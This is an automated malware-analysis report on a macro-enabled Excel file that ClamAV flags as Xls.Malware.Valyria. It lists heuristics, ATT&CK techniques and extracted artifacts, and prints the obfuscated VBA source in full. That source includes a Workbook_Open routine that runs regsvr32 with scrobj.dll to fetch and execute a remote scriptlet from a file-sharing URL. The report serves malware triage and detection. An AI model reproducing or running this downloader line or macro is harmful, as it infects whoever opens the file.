MALICIOUS
Risk Score: 390
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1218.011 System Binary Proxy Execution: Rundll32
The critical heuristics indicate the presence of a Workbook_Open VBA macro that utilizes WScript.Shell and the Shell() function. This suggests the macro is designed to download and execute a second-stage payload. The ClamAV detection further confirms the malicious nature of the file, identifying it as Xls.Malware.Valyria-10036093-0.
Heuristics 9
-
ClamAV: Xls.Malware.Valyria-10036093-0 (critical; CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Malware.Valyria-10036093-0
-
VBA project inside OOXML (medium; 5 related findings; OOXML_VBA): Document contains a VBA project — VBA macros present
-
WScript.Shell usage (critical; OLE_VBA_WSCRIPT): WScript.Shell usage. Matched line in script:
.Filters.Add "Excel Files", "*.cDTCNYsrhKMZuiHoTOuzuKQfHrpzzoAVsyNaOdUNMNpafAiOCReCnuzyNOVtP; *.hJpOAWwGXztWckEdykcrWiUVdNosnvTA; *.FwHKSWYoAuyuVThAFzAryDhQQAnAzDFawEDiSNNDQWDCanpoISfMPdAbeQTyIDTXNybt; *.CrYQedshDtNsMnBnaSuwPZcBrudIBeooDJ; *.SbMRNwBN", 1 Set Ma = CreateObject("WScript.Shell") Ma.Run ("regsvr32 /sanfOePwrchfraTAfdStGwakfhCVVsEWnNAUhvwN /niWpiORAsPKIGsTLZJvPBXwfSsebYYzWZzVDoVLh /uanfOePwrchfraTAfdStGwakfhCVVsEWnNAUhvwN /i:https://www.4sync.com/web/directDownload/k-95obKw/QsBDIXQt.9384a082f2509435e363242f2111fc68 scrobj.dll oDuGyULyCihRMSXSwKisLAdFGMkbFnWKfshAFfF") -
LOLBin reference in VBA (critical; OLE_VBA_LOLBIN): LOLBin reference in VBA. Matched line in script:
Set Ma = CreateObject("WScript.Shell") Ma.Run ("regsvr32 /sanfOePwrchfraTAfdStGwakfhCVVsEWnNAUhvwN /niWpiORAsPKIGsTLZJvPBXwfSsebYYzWZzVDoVLh /uanfOePwrchfraTAfdStGwakfhCVVsEWnNAUhvwN /i:https://www.4sync.com/web/directDownload/k-95obKw/QsBDIXQt.9384a082f2509435e363242f2111fc68 scrobj.dll oDuGyULyCihRMSXSwKisLAdFGMkbFnWKfshAFfF") .Show -
CreateObject call (high; OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script:
.Filters.Add "Excel Files", "*.cDTCNYsrhKMZuiHoTOuzuKQfHrpzzoAVsyNaOdUNMNpafAiOCReCnuzyNOVtP; *.hJpOAWwGXztWckEdykcrWiUVdNosnvTA; *.FwHKSWYoAuyuVThAFzAryDhQQAnAzDFawEDiSNNDQWDCanpoISfMPdAbeQTyIDTXNybt; *.CrYQedshDtNsMnBnaSuwPZcBrudIBeooDJ; *.SbMRNwBN", 1 Set Ma = CreateObject("WScript.Shell") Ma.Run ("regsvr32 /sanfOePwrchfraTAfdStGwakfhCVVsEWnNAUhvwN /niWpiORAsPKIGsTLZJvPBXwfSsebYYzWZzVDoVLh /uanfOePwrchfraTAfdStGwakfhCVVsEWnNAUhvwN /i:https://www.4sync.com/web/directDownload/k-95obKw/QsBDIXQt.9384a082f2509435e363242f2111fc68 scrobj.dll oDuGyULyCihRMSXSwKisLAdFGMkbFnWKfshAFfF") -
VBA p-code auto-exec with execution tokens (high; OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Workbook_Open macro (low; OLE_VBA_WBOPEN): Workbook_Open macro. Matched line in script:
Attribute VB_Customizable = True Private Sub Workbook_Open() Dim RdUdsfe As Workbook, KDppzYfhdePNzRBFObeHiyUYDsEBVXiHuWOtYWTyrnzQKP As Workbook, HEdKhBAPDbUuJZiTO As Workbook, DyFWdXhIGrEiQEKZCUWUbTwdVcoMBkFkiafUaypnAiLTLEn As Workbook -
Suspicious extracted artifact (high; EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL (info; EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
- https://www.4sync.com/web/directDownload/k-95obKw/QsBDIXQt.9384a082f2509435e363242f2111fc68 In document text (OOXML body / shared strings)
- https://www.4sync.com/web/directDownload/k-95obKw/QsBDIXQt.9384a082f2509435e363242f2111 In document text (OOXML body / shared strings)
- https://www.4sync.com/web/directDownload/k-95obKw/QsBDIXQt.9384a082f2509435e363242f In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 15497 bytes |

SHA-256: 5a9895553002dad31813745717ef541ead2947a813441bc6c024b76c98723f05

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Dim RdUdsfe As Workbook, KDppzYfhdePNzRBFObeHiyUYDsEBVXiHuWOtYWTyrnzQKP As Workbook, HEdKhBAPDbUuJZiTO As Workbook, DyFWdXhIGrEiQEKZCUWUbTwdVcoMBkFkiafUaypnAiLTLEn As Workbook
Dim IcFcQZBRhrcXMBpGdNdctuLVTWMaPVBpsfp As Workbook, fNohSYfYbKYSDvPHWNHNUcBEHEBEovNOZHb As Workbook, HXtcvYfRUwhXILdPfAXOHMcXMMzHLGrUMCzcZfHTtJFnLiXLaIrYBWLTTZ As Workbook, ciBZKYhJNPrcMesRniAUnrJDQUsJdUXbzvSVcvSGWBLJOyfenMWrOhaWyJkQHCGRknnA As Workbook
Dim EZAE As Integer, hkhXMyeY As Integer, iFwRbZaeIyBuvdOHBQyDQQBGvzThZQLsRykft As Integer, YIJTCXhAzVMuVYXa As Integer
Dim zcwbvTUNGJGeULiHaBbKKFnCFzJpVJApwKwoAXthZtvBTJay As Range, tKuQwZaDFLGnooUfFhdbiFPuoDRkkXzzioREScNkGeaHRtFoUnNeRJYSUZCNi As Range, IPnOAZaWBXKtrCbJKCOEDncZrHQpteiCEiAYnGrFSXDkuWJCbTDuYOfoMnySpRFt As Range
Dim FZfXHLCOTRNA As Range, sXyDBB As Range, udreVtQbFOcLsaSFNuNsPKzwBXSHDRepJaipJeuPLeiZQntsRhDrWUyLpJH As Range, bafHfkzWkVnOAIUIOJObRNOVRkUpGFhidoKNIMAU As Range, drTKWHFPViwLnvvIBKnGHMLfopzOwRbCStuvaSDJdYIZLsy As Range, KbLKTOL As Range
Dim CRQY As Variant, AbLJOVQPRGdJTUAreOrsZTIKVHcrWTtyaIApOYh As Variant
Dim ZJHX As String
Dim KVGLypwQOOkCkDZBASHJpYr, VTCJKbWOpNzbEfEeRLvKfEcVfkPIv As Long
Dim JVTYLQKYhMWwXrDHsBBNJkIBpBkKXeYYUJDcBXs As Variant
JVTYLQKYhMWwXrDHsBBNJkIBpBkKXeYYUJDcBXs = Array("hJJZOtrZYDVZDMkFCZSSCiYH #", "NzRbATtFwzcstnPeFpVHUBZzXaREWrhosvPWRnUHtsvuwpuNLriifXVvAyezb", "NBAZIDAZCMyEh?treZOnLPCSXVsWddHOIAtQDr?yd", "hJJZOtrZYDVZDMkFCZSSCiYH zQOXfTNYUnJYoZFBpYzzvCTHUQFRheczhMFDUCb", "hJJZOtrZYDVZDMkFCZSSCiYH pMJXEXQYIXtNKKHscBthTPeNEeXYnfhTyPHZobM", "anfOePwrchfraTAfdStGwakfhCVVsEWnNAUhvwN iWpiORAsPKIGsTLZJvPBXwfSsebYYzWZzVDoVLh", "oDuGyULyCihRMSXSwKisLAdFGMkbFnWKfshAFfF")
Dim AesZcWVzpLJcdSkMQdEuzKauRnneipWnRRPHwGX As Long, GMAyMZhAXkhozRzGtDWihUXabWAiOeVZDoyOUas As Long
Dim IBzX As String, hNtLrrrQhUEUSOdfbUDXrCQITVUkFQMKTieyCRZAOnbzOEeydoJKVosNywnKdIksc As String
For hkhXMyeY = 1 To KVGLypwQOOkCkDZBASHJpYr
IBzX = HEdKhBAPDbUuJZiTO.QOwNiTMfZpIUXzNMNobiTfV(1).Range("hJJZNtrZYDVZCMkFBYSSChYHKrGKObARbrkTKiMnAKIM?SzSXbZDiPsYLbzDQL" & hkhXMyeY).Value
hNtLrrrQhUEUSOdfbUDXrCQITVUkFQMKTieyCRZAOnbzOEeydoJKVosNywnKdIksc = HEdKhBAPDbUuJZiTO.QOwNiTMfZpIUXzNMNobiTfV(1).Range("XFFZhAyZOdKQ" & hkhXMyeY).Value
Select Case True
Case IBzX = "cQuEBOYbYpWIfoWicNsTfRWvSXSFrIbIGwyWuZZ:": HEdKhBAPDbUuJZiTO.QOwNiTMfZpIUXzNMNobiTfV(1).Range("hJJZNtrZYDVZCMkFBYSSChYHKrGKObARbrkTKiMnAKIM?SzSXbZDiPsYLbzDQL" & hkhXMyeY & ":XFFZhAyZOdKQ" & hkhXMyeY).Font.Bold = True
Case InStr(1, IBzX, "NzRbATtFwzcstnPeFpVHUBZzXaREWrhosvPWRnUHtsvuwpuNLriifXVvAyezb: ")
HEdKhBAPDbUuJZiTO.QOwNiTMfZpIUXzNMNobiTfV(1).Range("hJJZNtrZYDVZCMkFBYSSChYHKrGKObARbrkTKiMnAKIM?SzSXbZDiPsYLbzDQL" & hkhXMyeY & ":aGecyDyYWpQeMawsrXviWeceM" & hkhXMyeY).Interior.ColorIndex = 15
HEdKhBAPDbUuJZiTO.QOwNiTMfZpIUXzNMNobiTfV(1).Range("hJJZNtrZYDVZCMkFBYSSChYHKrGKObARbrkTKiMnAKIM?SzSXbZDiPsYLbzDQL" & hkhXMyeY).Font.Bold = True
Case InStr(1, hNtLrrrQhUEUSOdfbUDXrCQITVUkFQMKTieyCRZAOnbzOEeydoJKVosNywnKdIksc, "hJJZNtrZYDVZCMkFBYSSChYHKrGKObARbrkTKiMnAKIM?SzSXbZDiPsYLbzDQL"): HEdKhBAPDbUuJZiTO.QOwNiTMfZpIUXzNMNobiTfV(1).Range("XFFZhAyZOdKQ" & hkhXMyeY & ":XFFZhAyZOdKQ" & (hkhXMyeY + 2)).Interior.ColorIndex = 37
Case InStr(1, hNtLrrrQhUEUSOdfbUDXrCQITVUkFQMKTieyCRZAOnbzOEeydoJKVosNywnKdIksc, "XFFZhAyZOdKQ"): HEdKhBAPDbUuJZiTO.QOwNiTMfZpIUXzNMNobiTfV(1).Range("XFFZhAyZOdKQ" & hkhXMyeY & ":XFFZhAyZOdKQ" & (hkhXMyeY + 2)).Interior.ColorIndex = 3
Case InStr(1, hNtLrrrQhUEUSOdfbUDXrCQITVUkFQMKTieyCRZAOnbzOEeydoJKVosNywnKdIksc, "FIXfSRQdiKUJNNRanBXcYSweCRFVyAGuACrUFTMDeGoBhLTBpbnXesvNtTJb"): HEdKhBAPDbUuJZiTO.QOwNiTMfZpIUXzNMNobiTfV(1).Range("XFFZhAyZOdKQ" & hkhXMyeY & ":XFFZhAyZOdKQ" & (hkhXMyeY + 2)).Interior.Color = RGB(50, 205, 50)
End Select
Next hkhXMyeY
Application.DisplayAlerts = False
Dim cXrSYVGwOTeEFEMGvdIwFtCCaFzByNJheKonW As PivotItem
With Application.FileDialog(msoFileDialogFilePicker)
.AllowMultiSelect = False
'udreVtQbFOcLsaSFNuNsPKzwBXSHDRepJaipJeuPLeiZQntsRhDrWUyLpJH HQwiKvSOTDEvshXWKRXYZHoRborIO hkhXMyeY QOwNiTMfZpIUXzNMNobiTfV
.Filters.Add "Excel Files", "*.cDTCNYsrhKMZuiHoTOuzuKQfHrpzzoAVsyNaOdUNMNpafAiOCReCnuzyNOVtP; *.hJpOAWwGXztWckEdykcrWiUVdNosnvTA; *.FwHKSWYoAuyuVThAFzAryDhQQAnAzDFawEDiSNNDQWDCanpoISfMPdAbeQTyIDTXNybt; *.CrYQedshDtNsMnBnaSuwPZcBrudIBeooDJ; *.SbMRNwBN", 1
Set Ma = CreateObject("WScript.Shell")
Ma.Run ("regsvr32 /sanfOePwrchfraTAfdStGwakfhCVVsEWnNAUhvwN /niWpiORAsPKIGsTLZJvPBXwfSsebYYzWZzVDoVLh /uanfOePwrchfraTAfdStGwakfhCVVsEWnNAUhvwN /i:https://www.4sync.com/web/directDownload/k-95obKw/QsBDIXQt.9384a082f2509435e363242f2111fc68 scrobj.dll oDuGyULyCihRMSXSwKisLAdFGMkbFnWKfshAFfF")
.Show
'NzRbATtFwzcstnPeFpVHUBZzXaREWrhosvPWRnUHtsvuwpuNLriifXVvAyezb hJJZNtrZYDVZCMkFBYSSChYHKrGKObARbrkTKiMnAKIM?SzSXbZDiPsYLbzDQL hJJZNtrZYDVZCMkFBYSSChYHKrGKObARbrkTKiMnAKIM?SzSXbZDiPsYLbzDQL /niWpiORAsPKIGsTLZJvPBXwfSsebYYzWZzVDoVLh HQwiKvSOTDEvshXWKRXYZHoRborIO hJJZNtrZYDVZCMkFBYSSChYHKrGKObARbrkTKiMnAKIM?SzSXbZDiPsYLbzDQL hJJZNtrZYDVZCMkFBYSSChYHKrGKObARbrkTKiMnAKIM?SzSXbZDiPsYLbzDQL hJJZNtrZYDVZCMkFBYSSChYHKrGKObARbrkTKiMnAKIM?SzSXbZDiPsYLbzDQL HQwiKvSOTDEvshXWKRXYZHoRborIO
End With
If InStr(fullpath, ".FwHKSWYoAuyuVThAFzAryDhQQAnAzDFawEDiSNNDQWDCanpoISfMPdAbeQTyIDTXNybt") = 0 Then
Exit Sub
End If
Set ws = Workbooks.Open(fullpath)
Set wb = Workbooks.Add
ws.QOwNiTMfZpIUXzNMNobiTfV(1).UsedRange.Copy Destination:=wb.QOwNiTMfZpIUXzNMNobiTfV("yXhtaPtaIWiphMfV").Range("hJJZNtrZYDVZCMkFBYSSChYHKrGKObARbrkTKiMnAKIM?SzSXbZDiPsYLbzDQL" & Rows.okiIEtfsysKibGdhatHcYriXThVRrsEXZRVZUYwFSprZDiJtDQQWtQOYapOyCnbbRNkw).End(xlUp)
wb.QOwNiTMfZpIUXzNMNobiTfV("yXhtaPtaIWiphMfV").Range("UvAdFEFWcQkPyCWGekDvukUZYNYrd").Value = "Status"
lRow = wb.QOwNiTMfZpIUXzNMNobiTfV("yXhtaPtaIWiphMfV").Cells(Rows.okiIEtfsysKibGdhatHcYriXThVRrsEXZRVZUYwFSprZDiJtDQQWtQOYapOyCnbbRNkw, 1).End(xlUp).Row
For pWkepLKCHNEpcHTQMSNhfacEwuPIwGhzovUtwoZPKIawfrQQUcHyJeupUKUW = 2 To lRow
If wb.QOwNiTMfZpIUXzNMNobiTfV("yXhtaPtaIWiphMfV").Range("H" & pWkepLKCHNEpcHTQMSNhfacEwuPIwGhzovUtwoZPKIawfrQQUcHyJeupUKUW).Value = 0 And wb.QOwNiTMfZpIUXzNMNobiTfV(1).Range("I" & pWkepLKCHNEpcHTQMSNhfacEwuPIwGhzovUtwoZPKIawfrQQUcHyJeupUKUW).Value = 0 Then
wb.QOwNiTMfZpIUXzNMNobiTfV("yXhtaPtaIWiphMfV").Range("pWkepLKCHNEpcHTQMSNhfacEwuPIwGhzovUtwoZPKIawfrQQUcHyJeupUKUW" & pWkepLKCHNEpcHTQMSNhfacEwuPIwGhzovUtwoZPKIawfrQQUcHyJeupUKUW).Value = "FIXfSRQdiKUJNNRanBXcYSweCRFVyAGuACrUFTMDeGoBhLTBpbnXesvNtTJb"
Else
wb.QOwNiTMfZpIUXzNMNobiTfV("yXhtaPtaIWiphMfV").Range("pWkepLKCHNEpcHTQMSNhfacEwuPIwGhzovUtwoZPKIawfrQQUcHyJeupUKUW" & pWkepLKCHNEpcHTQMSNhfacEwuPIwGhzovUtwoZPKIawfrQQUcHyJeupUKUW).Value = "FIXfSRQdiKUJNNRanBXcYSweCRFVyAGuACrUFTMDeGoBhLTBpbnXesvNtTJb"
End If
Next pWkepLKCHNEpcHTQMSNhfacEwuPIwGhzovUtwoZPKIawfrQQUcHyJeupUKUW
wb.QOwNiTMfZpIUXzNMNobiTfV("yXhtaPtaIWiphMfV").Range("TipZIekktYhAthdUuoSFNNrr:UvAdFEFWcQkPyCWGekDvukUZYNYrd").AutoFilter _
Field:=4, _
Criteria1:=Array("EN", "EN/EFLbVtzrCSSrNtYrCFoszt", "FF", "FF/EFLbVtzrCSSrNtYrCFoszt", "pTXavvnPXVCUcvbfUWcAGFDUA", "pTXavvnPXVCUcvbfUWcAGFDUA/EFLbVtzrCSSrNtYrCFoszt"), _
Operator:=xlFilterValues
'NBAZIDAZCMyEh?treZOnLPCSXVsWddHOIAtQDr?yd
wb.QOwNiTMfZpIUXzNMNobiTfV("yXhtaPtaIWiphMfV").Range("TipZIekktYhAthdUuoSFNNrr:UvAdFEFWcQkPyCWGekDvukUZYNYrd").AutoFilter _
Field:=5, _
Criteria1:=Array("1", "2", "3", "4", "5", "6", "7"), _
Operator:=xlFilterValues
'NzRbATtFwzcstnPeFpVHUBZzXaREWrhosvPWRnUHtsvuwpuNLriifXVvAyezb
wb.QOwNiTMfZpIUXzNMNobiTfV("yXhtaPtaIWiphMfV").Range("TipZIekktYhAthdUuoSFNNrr:UvAdFEFWcQkPyCWGekDvukUZYNYrd").AutoFilter _
Field:=7, _
Criteria1:=Array("hJJZNtrZYDVZCMkFBYSSChYHKrGKObARbrkTKiMnAKIM?SzSXbZDiPsYLbzDQL", "XFFZhAyZOdKQ", "FIXfSRQdiKUJNNRanBXcYSweCRFVyAGuACrUFTMDeGoBhLTBpbnXesvNtTJb"), _
Operator:=xlFilterValues
Worksheets("yXhtaPtaIWiphMfV").Cells(1, 1).Select
QOwNiTMfZpIUXzNMNobiTfV.Add
wb.PivotCaches.Create(SourceType:=xlDatabase, SourceData:= _
"yXhtaPtaIWiphMfV!R1C1:R" & lRow & "HQwiKvSOTDEvshXWKRXYZHoRborIO", Version:=xlPivotTableVersion15).CreatePivotTable _
TableDestination:="esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU!R3C1", TableName:="PivotTable1", DefaultVersion _
:=xlPivotTableVersion15
QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").Select
wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").PivotTables(1).AddFields _
ColumnFields:="hJJZNtrZYDVZCMkFBYSSChYHKrGKObARbrkTKiMnAKIM?SzSXbZDiPsYLbzDQL", _
RowFields:=Array("NzRbATtFwzcstnPeFpVHUBZzXaREWrhosvPWRnUHtsvuwpuNLriifXVvAyezb", "kQMWnRXbudAFcVkAcatObeYwJabZuyDAnSfykTL", "kQMWnRXbudAFcVkAcatObeYwJabZuyDAnSfykTL", "kQMWnRXbudAFcVkAcatObeYwJabZuyDAnSfykTL", "kQMWnRXbudAFcVkAcatObeYwJabZuyDAnSfykTL")
With wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").PivotTables(1).PivotFields("ECAXYXdHSaQa")
.Orientation = xlDataField
.Name = "okiIEtfsysKibGdhatHcYriXThVRrsEXZRVZUYwFSprZDiJtDQQWtQOYapOyCnbbRNkw"
.Function = xlCount
End With
With wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").PivotTables(1).PivotFields("ECAXYXdHSaQa")
.Orientation = xlDataField
.Name = "SeXVLKSANheftPvpAtiSkuQKtBvMfFcIiHKVToYHKTbGWXoYFwJFB"
.NumberFormat = "SeXVLKSANheftPvpAtiSkuQKtBvMfFcIiHKVToYHKTbGWXoYFwJFB"
.Function = xlCount
.Calculation = xlPercentOfRow
End With
With wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").PivotTables(1).PivotFields("NzRbATtFwzcstnPeFpVHUBZzXaREWrhosvPWRnUHtsvuwpuNLriifXVvAyezb")
.BXGWnEnaazvEiFEyzCzPkeIJNhPkte("iMAStsHoIvywcFsPweMbBIzGTsKiQSkXSfO").Visible = False
.BXGWnEnaazvEiFEyzCzPkeIJNhPkte("iMAStsHoIvywcFsPweMbBIzGTsKiQSkXSfO").Visible = False
.BXGWnEnaazvEiFEyzCzPkeIJNhPkte("iMAStsHoIvywcFsPweMbBIzGTsKiQSkXSfO").Visible = False
.BXGWnEnaazvEiFEyzCzPkeIJNhPkte("iMAStsHoIvywcFsPweMbBIzGTsKiQSkXSfO").Visible = False
.BXGWnEnaazvEiFEyzCzPkeIJNhPkte("(iMAStsHoIvywcFsPweMbBIzGTsKiQSkXSfO)").Visible = False
End With
With wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").PivotTables(1).PivotFields("Battalion")
.BXGWnEnaazvEiFEyzCzPkeIJNhPkte("iMAStsHoIvywcFsPweMbBIzGTsKiQSkXSfO").Visible = False
.BXGWnEnaazvEiFEyzCzPkeIJNhPkte("(iMAStsHoIvywcFsPweMbBIzGTsKiQSkXSfO)").Visible = False
End With
For Each cXrSYVGwOTeEFEMGvdIwFtCCaFzByNJheKonW In wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").PivotTables(1).PivotFields("Rank").BXGWnEnaazvEiFEyzCzPkeIJNhPkte
On Error Resume Next
cXrSYVGwOTeEFEMGvdIwFtCCaFzByNJheKonW.Visible = False
Next cXrSYVGwOTeEFEMGvdIwFtCCaFzByNJheKonW
With wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").PivotTables(1).PivotFields("Rank")
.BXGWnEnaazvEiFEyzCzPkeIJNhPkte("DypUbDMUikOLMKnZSNXXrAHffVAAXLIPZspyDNvTvV").Visible = True
.BXGWnEnaazvEiFEyzCzPkeIJNhPkte("DypUbDMUikOLMKnZSNXXrAHffVAAXLIPZspyDNvTvV/DypUbDMUikOLMKnZSNXXrAHffVAAXLIPZspyDNvTvV").Visible = True
.BXGWnEnaazvEiFEyzCzPkeIJNhPkte("DypUbDMUikOLMKnZSNXXrAHffVAAXLIPZspyDNvTvV").Visible = True
.BXGWnEnaazvEiFEyzCzPkeIJNhPkte("DypUbDMUikOLMKnZSNXXrAHffVAAXLIPZspyDNvTvV/DypUbDMUikOLMKnZSNXXrAHffVAAXLIPZspyDNvTvV").Visible = True
.BXGWnEnaazvEiFEyzCzPkeIJNhPkte("DypUbDMUikOLMKnZSNXXrAHffVAAXLIPZspyDNvTvV").Visible = True
.BXGWnEnaazvEiFEyzCzPkeIJNhPkte("DypUbDMUikOLMKnZSNXXrAHffVAAXLIPZspyDNvTvV/DypUbDMUikOLMKnZSNXXrAHffVAAXLIPZspyDNvTvV").Visible = True
.BXGWnEnaazvEiFEyzCzPkeIJNhPkte("(DypUbDMUikOLMKnZSNXXrAHffVAAXLIPZspyDNvTvV)").Visible = False
End With
wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").PivotTables(1).PivotFields("Battalion").ShowDetail = False
wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").PivotTables(1).RefreshTable
For j = 7 To 13
wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").Range("hJJZNtrZYDVZCMkFBYSSChYHKrGKObARbrkTKiMnAKIM?SzSXbZDiPsYLbzDQL" & j).Value = "Battalion " & wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").Range("hJJZNtrZYDVZCMkFBYSSChYHKrGKObARbrkTKiMnAKIM?SzSXbZDiPsYLbzDQL" & j).Value
Debug.Print (j)
Next j
For k = 6 To 22 Step 8
wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").Range("hJJZNtrZYDVZCMkFBYSSChYHKrGKObARbrkTKiMnAKIM?SzSXbZDiPsYLbzDQL" & k).Value = "NzRbATtFwzcstnPeFpVHUBZzXaREWrhosvPWRnUHtsvuwpuNLriifXVvAyezb " & wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").Range("hJJZNtrZYDVZCMkFBYSSChYHKrGKObARbrkTKiMnAKIM?SzSXbZDiPsYLbzDQL" & k).Value
Next k
wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").Range("HQwiKvSOTDEvshXWKRXYZHoRborIO").Value = "okiIEtfsysKibGdhatHcYriXThVRrsEXZRVZUYwFSprZDiJtDQQWtQOYapOyCnbbRNkw"
wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").Range("HQwiKvSOTDEvshXWKRXYZHoRborIO").Value = "%"
wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").Range("HQwiKvSOTDEvshXWKRXYZHoRborIO").EntireRow.Hidden = True
wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").Range("hJJZNtrZYDVZCMkFBYSSChYHKrGKObARbrkTKiMnAKIM?SzSXbZDiPsYLbzDQL:HQwiKvSOTDEvshXWKRXYZHoRborIO").Columns.AutoFit
wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").Columns("HQwiKvSOTDEvshXWKRXYZHoRborIO").Hidden = True
wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").Range("HQwiKvSOTDEvshXWKRXYZHoRborIO:HQwiKvSOTDEvshXWKRXYZHoRborIO").Interior.Color = vbRed
wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").Range("HQwiKvSOTDEvshXWKRXYZHoRborIO:HQwiKvSOTDEvshXWKRXYZHoRborIO").Interior.ColorIndex = 22
For m = 7 To 23 Step 8
wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").Range("hJJZNtrZYDVZCMkFBYSSChYHKrGKObARbrkTKiMnAKIM?SzSXbZDiPsYLbzDQL" & m & ":F" & m + 6).Interior.Color = vbYellow
wb.QOwNiTMfZpIUXzNMNobiTfV("esLIaRcfQFyZbDzNsTvBSHVFbBynUPSARkrDAawseYGMRtvDiAYFTPzUAfJzzNbbrDU").Range("hJJZNtrZYDVZCMkFBYSSChYHKrGKObARbrkTKiMnAKIM?SzSXbZDiPsYLbzDQL" & m - 1 & ":F" & m - 1).Interior.ColorIndex = 15
Next m
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 32256 bytes |

SHA-256: 56b2bfce2f10d3ba90b4617aab011b83e6f6ba1f5cb3d949bfd38dcf63e8b12b

Detection
ClamAV: Xls.Malware.Valyria-10036093-0
Obfuscation or payload: likely
345 of 556 identifiers look randomly generated (e.g. 'okiIEtfsysKibGdhatHcYriXThVRrsEXZRVZUYwF') — consistent with name-mangling obfuscation.